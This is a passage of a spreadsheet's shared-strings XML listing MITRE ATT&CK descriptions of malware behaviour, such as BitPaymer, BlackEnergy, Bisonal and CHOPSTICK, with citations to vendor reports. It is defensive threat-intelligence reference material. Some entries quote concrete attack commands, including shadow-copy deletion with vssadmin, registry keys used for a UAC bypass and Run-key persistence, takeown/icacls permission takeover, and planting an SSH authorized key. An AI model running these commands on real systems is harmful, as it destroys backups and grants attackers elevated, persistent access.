    <t xml:space="preserve">[BendyBear](https://attack.mitre.org/software/S0574) communicates to a C2 server over port 443 using modified RC4 and XOR-encrypted chunks.(Citation: Unit42 BendyBear Feb 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[BendyBear](https://attack.mitre.org/software/S0574) has the ability to determine local time on a compromised host.(Citation: Unit42 BendyBear Feb 2021) </t>
  </si>
  <si>
    <t xml:space="preserve">[BendyBear](https://attack.mitre.org/software/S0574) can check for analysis environments and signs of debugging using the Windows API &lt;code&gt;kernel32!GetTickCountKernel32&lt;/code&gt; call.(Citation: Unit42 BendyBear Feb 2021) </t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) decodes strings in the malware using XOR and RC4.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) deletes its dropper and VBS scripts from the victim’s machine.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has the capability to download files to execute on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268)'s DLL file and non-malicious decoy file are encrypted with RC4.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) can obtain a list of running processes on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) adds itself to the Registry key &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\CurrentVersion\Run\&lt;/code&gt; for persistence.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) uses rundll32.exe to execute as part of the Registry Run key it adds: &lt;code&gt;HKEY_CURRENT_USER \Software\Microsoft\Windows\CurrentVersion\Run\”vert” = “rundll32.exe c:\windows\temp\pvcu.dll , Qszdez”&lt;/code&gt;.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) variants reported on in 2014 and 2015 used a simple XOR cipher for C2. Some [Bisonal](https://attack.mitre.org/software/S0268) samples encrypt C2 communications with RC4.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) has a command to gather system information from the victim’s machine.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) can execute &lt;code&gt;ipconfig&lt;/code&gt; on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268)'s dropper creates VBS scripts on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) uses HTTP for C2 communications.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[Bisonal](https://attack.mitre.org/software/S0268) can launch cmd.exe to execute commands on the system.(Citation: Unit 42 Bisonal July 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can suppress UAC prompts by setting the &lt;code&gt;HKCU\Software\Classes\ms-settings\shell\open\command&lt;/code&gt; registry key on Windows 10 or &lt;code&gt;HKCU\Software\Classes\mscfile\shell\open\command&lt;/code&gt; on Windows 7 and launching the &lt;code&gt;eventvwr.msc&lt;/code&gt; process, which launches [BitPaymer](https://attack.mitre.org/software/S0570) with elevated privileges.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can import a hard-coded RSA 1024-bit public key, generate a 128-bit RC4 key for each file, and encrypt the file in place, appending &lt;code&gt;.locked&lt;/code&gt; to the filename.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) compares file names and paths to a list of excluded names and directory names during encryption.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) attempts to remove the backup shadow files from the host using &lt;code&gt;vssadmin.exe Delete Shadows /All /Quiet&lt;/code&gt;.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can enumerate the sessions for each user logged onto the infected host.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[BitPaymer](https://attack.mitre.org/software/S0570) can set values in the Registry to help in execution.(Citation: Crowdstrike Indrik November 2018) </t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has copied itself to the &lt;code&gt;:bin&lt;/code&gt; alternate data stream of a newly created file.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has used dynamic API resolution to avoid identifiable strings within the binary, including &lt;code&gt;RegEnumKeyW&lt;/code&gt;.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can search for network shares on the domain or workgroup using &lt;code&gt;net view &lt;host&gt;&lt;/code&gt;.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has used RC4-encrypted strings and string hashes to avoid identifiable strings within the binary.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[BitPaymer](https://attack.mitre.org/software/S0570) can use the RegEnumKeyW to iterate through Registry keys.(Citation: Crowdstrike Indrik November 2018) </t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has set the run key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; for persistence.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can use &lt;code&gt;net view&lt;/code&gt; to discover remote systems.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can enumerate existing Windows services on the host that are configured to run as LocalSystem.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can modify the timestamp of an executable so that it can be identified and restored by the decryption tool.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can use the tokens of users to create processes on infected systems.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>Windows File and Directory Permissions Modification</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) can use &lt;code&gt;icacls /reset&lt;/code&gt; and &lt;code&gt;takeown /F&lt;/code&gt; to reset a targeted executable's permissions and then take ownership.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BitPaymer](https://attack.mitre.org/software/S0570) has attempted to install itself as a service to maintain persistence.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) attempts to bypass default User Access Control (UAC) settings by exploiting a backward-compatibility setting found in Windows 7 and later.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>Clear Windows Event Logs</t>
  </si>
  <si>
    <t>The [BlackEnergy](https://attack.mitre.org/software/S0089) component KillDisk is capable of deleting Windows Event Logs.(Citation: ESEST Black Energy Jan 2016)</t>
  </si>
  <si>
    <t>Code Signing Policy Modification</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has enabled the &lt;code&gt;TESTSIGNING&lt;/code&gt; boot configuration option to facilitate loading of a driver component.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has used a plug-in to gather credentials stored in files on the host by various software programs, including The Bat! email client, Outlook, and Windows Credential Store.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has used a plug-in to gather credentials from web browsers including FireFox, Google Chrome, and Internet Explorer.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) 2 contains a "Destroy" plug-in that destroys data stored on victim hard drives by overwriting file contents.(Citation: Securelist BlackEnergy Feb 2015)(Citation: ESET BlackEnergy Jan 2016)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) injects its DLL component into svchost.exe.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has the capability to communicate over a backup channel via plus.google.com.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) gathers a list of installed apps from the uninstall program Registry. It also gathers registered mail, browser, and instant messaging clients from the Registry. [BlackEnergy](https://attack.mitre.org/software/S0089) has searched for given file types.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has removed the watermark associated with enabling the &lt;code&gt;TESTSIGNING&lt;/code&gt; boot configuration option by removing the relevant strings in the &lt;code&gt;user32.dll.mui&lt;/code&gt; of the system.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has run a keylogger plug-in on a victim.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has conducted port scans on a host.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) can gather very specific information about attached USB devices, to include device instance ID and drive geometry.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has gathered a process list by using [Tasklist](https://attack.mitre.org/software/S0057).exe.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)(Citation: ESET BlackEnergy Jan 2016)</t>
  </si>
  <si>
    <t>The [BlackEnergy](https://attack.mitre.org/software/S0089) 3 variant drops its main DLL component and then creates a .lnk shortcut to that file in the startup folder.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has run a plug-in on a victim to spread through the local network by using [PsExec](https://attack.mitre.org/software/S0029) and accessing admin shares.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) is capable of taking screenshots.(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>Services File Permissions Weakness</t>
  </si>
  <si>
    <t>One variant of [BlackEnergy](https://attack.mitre.org/software/S0089) locates existing driver services that have been disabled and drops its driver component into one of those service's paths, replacing the legitimate executable. The malware then sets the hijacked service to start automatically to establish persistence.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has used [Systeminfo](https://attack.mitre.org/software/S0096) to gather the OS version, as well as information on the system configuration, BIOS, the motherboard, and the processor.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has gathered information about network IP configurations using [ipconfig](https://attack.mitre.org/software/S0100).exe and about routing tables using [route](https://attack.mitre.org/software/S0103).exe.(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) has gathered information about local network connections using [netstat](https://attack.mitre.org/software/S0104).(Citation: F-Secure BlackEnergy 2014)(Citation: Securelist BlackEnergy Nov 2014)</t>
  </si>
  <si>
    <t>[BlackEnergy](https://attack.mitre.org/software/S0089) communicates with its C2 server over HTTP.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>A [BlackEnergy](https://attack.mitre.org/software/S0089) 2 plug-in uses WMI to gather victim host details.(Citation: Securelist BlackEnergy Feb 2015)</t>
  </si>
  <si>
    <t>One variant of [BlackEnergy](https://attack.mitre.org/software/S0089) creates a new service using either a hard-coded or randomly generated name.(Citation: F-Secure BlackEnergy 2014)</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) can copy files on a compromised host.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) has the ability to find files on the targeted system.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) has the ability to download files to the victim's machine.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) can enumerate local drives on a compromised host.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) can send commands to C2 in the body of HTTP POST requests.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[BlackMould](https://attack.mitre.org/software/S0564) can run cmd.exe with parameters.(Citation: Microsoft GALLIUM December 2019)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can compress data collected by its SharpHound ingestor into a ZIP file to be written to disk.(Citation: GitHub Bloodhound)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect information about domain users, including identification of domain admin accounts.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect information about domain groups and members.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) has the ability to map domain trusts and identify misconfigurations for potential abuse.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can identify users with local administrator rights.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>Local Groups</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect information about local groups and members.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can use .NET API calls in the SharpHound ingestor component to pull Active Directory data.(Citation: GitHub Bloodhound)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect password policy information on the target environment.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can use PowerShell to pull Active Directory information from the target environment.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can enumerate and collect the properties of domain computers, including domain controllers.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[BloodHound](https://attack.mitre.org/software/S0521) can collect information on user sessions.(Citation: CrowdStrike BloodHound April 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can create bind and reverse shells on the infected system.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) has maliciously altered the OpenSSH binary on targeted systems to create a backdoor.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can download additional modules from the C2 server.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can use the &lt;code&gt;ps&lt;/code&gt; command to discover other cryptocurrency miners active on the system.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can download an additional module which has a cryptocurrency mining extension.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can XOR-encrypt C2 communications.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) has discovered the OS version, CPU model, and RAM size of the system it has been installed on.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) can find the external IP address of the infected host.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Bonadan](https://attack.mitre.org/software/S0486) has discovered the username of the user running the backdoor.(Citation: ESET ForSSHe December 2018)</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) terminates antimalware processes.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>Some [Brave Prince](https://attack.mitre.org/software/S0252) variants have used South  Korea's Daum email service to exfiltrate information, and later variants have posted the data to a web server via an HTTP post command.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) gathers file and directory information from the victim’s machine.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) lists the running processes.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) gathers information about the Registry.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) collects hard drive content and system configuration information.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Brave Prince](https://attack.mitre.org/software/S0252) gathers network configuration information as well as the ARP cache.(Citation: McAfee Gold Dragon)</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) downloads files onto infected hosts.(Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) creates run key Registry entries pointing to malicious DLLs dropped to disk.(Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) uses rundll32 within [Registry Run Keys / Startup Folder](https://attack.mitre.org/techniques/T1547/001) entries to execute malicious DLLs.(Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t>[Briba](https://attack.mitre.org/software/S0204) installs a service pointing to a malicious DLL dropped to disk.(Citation: Symantec Briba May 2012)</t>
  </si>
  <si>
    <t>AppleScript</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can use AppleScript to inject malicious JavaScript into a browser.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can install malicious browser extensions that are used to hijack user searches.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has used &lt;code&gt;openssl&lt;/code&gt; to decrypt AES encrypted payload data. [Bundlore](https://attack.mitre.org/software/S0482) has also used base64 and RC4 with a hardcoded key to deobfuscate data.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can change macOS security settings and browser preferences to enable follow-on behaviors.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has been spread through malicious advertisements on websites.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>GUI Input Capture</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) prompts the user for their credentials.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can download and execute new versions of itself.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can execute JavaScript by injecting it into the victim's browser.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>Launch Agent</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can persist via a LaunchAgent.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) can persist via a LaunchDaemon.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has attempted to get users to execute a malicious .app file that looks like a Flash Player update.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has disguised a malicious .app file as a Flash Player update.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has obfuscated data with base64, AES, RC4, and bz2.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has used the &lt;code&gt;ps&lt;/code&gt; command to list processes.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>Python</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has used Python scripts to execute payloads.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>SSH Authorized Keys</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) creates a new key pair with &lt;code&gt;ssh-keygen&lt;/code&gt; and drops the newly created user key in &lt;code&gt;authorized_keys&lt;/code&gt; to enable remote login.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has the ability to enumerate what browser is being used as well as version information for Safari.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) will enumerate the macOS version to determine which follow-on behaviors to execute.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) has leveraged /bin/sh and /bin/bash to execute commands on the victim machine.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>[Bundlore](https://attack.mitre.org/software/S0482) uses HTTP requests for C2.(Citation: MacKeeper Bundlore Apr 2019)</t>
  </si>
  <si>
    <t>The [CALENDAR](https://attack.mitre.org/software/S0025) malware communicates through the use of events in Google Calendar.(Citation: Mandiant APT1)(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[CALENDAR](https://attack.mitre.org/software/S0025) has a command to run cmd.exe to execute commands.(Citation: Mandiant APT1 Appendix)</t>
  </si>
  <si>
    <t>[CARROTBALL](https://attack.mitre.org/software/S0465) has the ability to use FTP in C2 communications.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[CARROTBALL](https://attack.mitre.org/software/S0465) has the ability to download and install a remote payload.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[CARROTBALL](https://attack.mitre.org/software/S0465) has been executed through users being lured into opening malicious e-mail attachments.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[CARROTBALL](https://attack.mitre.org/software/S0465) has used a custom base64 alphabet to decode files.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to delete downloaded files from a compromised host.(Citation: Unit 42 CARROTBAT November 2018)</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to download and execute a remote file via [certutil](https://attack.mitre.org/software/S0160).(Citation: Unit 42 CARROTBAT November 2018)</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to download a base64 encoded payload and execute obfuscated commands on the infected host.(Citation: Unit 42 CARROTBAT November 2018)</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to determine the operating system of the compromised host and whether Windows is being run with x86 or x64 architecture.(Citation: Unit 42 CARROTBAT November 2018)(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>[CARROTBAT](https://attack.mitre.org/software/S0462) has the ability to execute command line arguments on a compromised host.(Citation: Unit 42 CARROTBAT January 2020)</t>
  </si>
  <si>
    <t>Compromise Software Supply Chain</t>
  </si>
  <si>
    <t>[CCBkdr](https://attack.mitre.org/software/S0222) was added to a legitimate, signed version 5.33 of the CCleaner software and distributed on CCleaner's distribution site.(Citation: Talos CCleanup 2017)(Citation: Intezer Aurora Sept 2017)(Citation: Avast CCleaner3 2018)</t>
  </si>
  <si>
    <t>[CCBkdr](https://attack.mitre.org/software/S0222) can use a DGA for [Fallback Channels](https://attack.mitre.org/techniques/T1008) if communications with the primary command and control server are lost.(Citation: Talos CCleanup 2017)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) encrypts C2 communications with TLS.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) is capable of performing remote command execution.(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>Part of [APT28](https://attack.mitre.org/groups/G0007)'s operation involved using [CHOPSTICK](https://attack.mitre.org/software/S0023) modules to copy itself to air-gapped machines, using files written to USB sticks to transfer data and command traffic.(Citation: FireEye APT28)(Citation: ESET Sednit Part 2)(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) can use a DGA for [Fallback Channels](https://attack.mitre.org/techniques/T1008), domains are generated by concatenating words from lists.(Citation: ESET Sednit 2017 Activity)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) can switch to a new C2 channel if the current one is broken.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>An older version of [CHOPSTICK](https://attack.mitre.org/software/S0023) has a module that monitors all mounted volumes for files with the extensions .doc, .docx, .pgp, .gpg, .m2f, or .m2o.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) is capable of performing remote file transmission.(Citation: Crowdstrike DNC June 2016)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) used a proxy server between victims and the C2 server.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) is capable of performing keylogging.(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 2)(Citation: DOJ GRU Indictment Jul 2018)</t>
  </si>
  <si>
    <t>Various implementations of [CHOPSTICK](https://attack.mitre.org/software/S0023) communicate with C2 over SMTP and POP3.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) may store RC4 encrypted configuration information in the Windows Registry.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) provides access to the Windows Registry, which can be used to gather information.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>Part of [APT28](https://attack.mitre.org/groups/G0007)'s operation involved using [CHOPSTICK](https://attack.mitre.org/software/S0023) modules to copy itself to air-gapped machines and using files written to USB sticks to transfer data and command traffic.(Citation: FireEye APT28)(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) has the capability to capture screenshots.(Citation: DOJ GRU Indictment Jul 2018)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) checks for antivirus and forensics software.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023) encrypts C2 communications with RC4.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>[CHOPSTICK](https://attack.mitre.org/software/S0023)  includes runtime checks to identify an analysis environment and prevent execution on it.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>Various implementations of [CHOPSTICK](https://attack.mitre.org/software/S0023) communicate with C2 over HTTP.(Citation: ESET Sednit Part 2)</t>
  </si>
  <si>
    <t>Archive via Utility</t>
  </si>
  <si>
    <t>[CORALDECK](https://attack.mitre.org/software/S0212) has created password-protected RAR, WinImage, and zip archives to be exfiltrated.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[CORALDECK](https://attack.mitre.org/software/S0212) has exfiltrated data in HTTP POST headers.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>[CORALDECK](https://attack.mitre.org/software/S0212) searches for specified files.(Citation: FireEye APT37 Feb 2018)</t>
  </si>
  <si>
    <t>Binary Padding</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) contains unused machine instructions in a likely attempt to hinder analysis.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) downloads another dropper from its C2 server.(Citation: FireEye APT28)</t>
  </si>
  <si>
    <t>[CORESHELL](https://attack.mitre.org/software/S0137) can communicate over SMTP and POP3 for C2.(Citation: FireEye APT28)(Citation: Microsoft SIR Vol 19)</t>
  </si>
  <si>
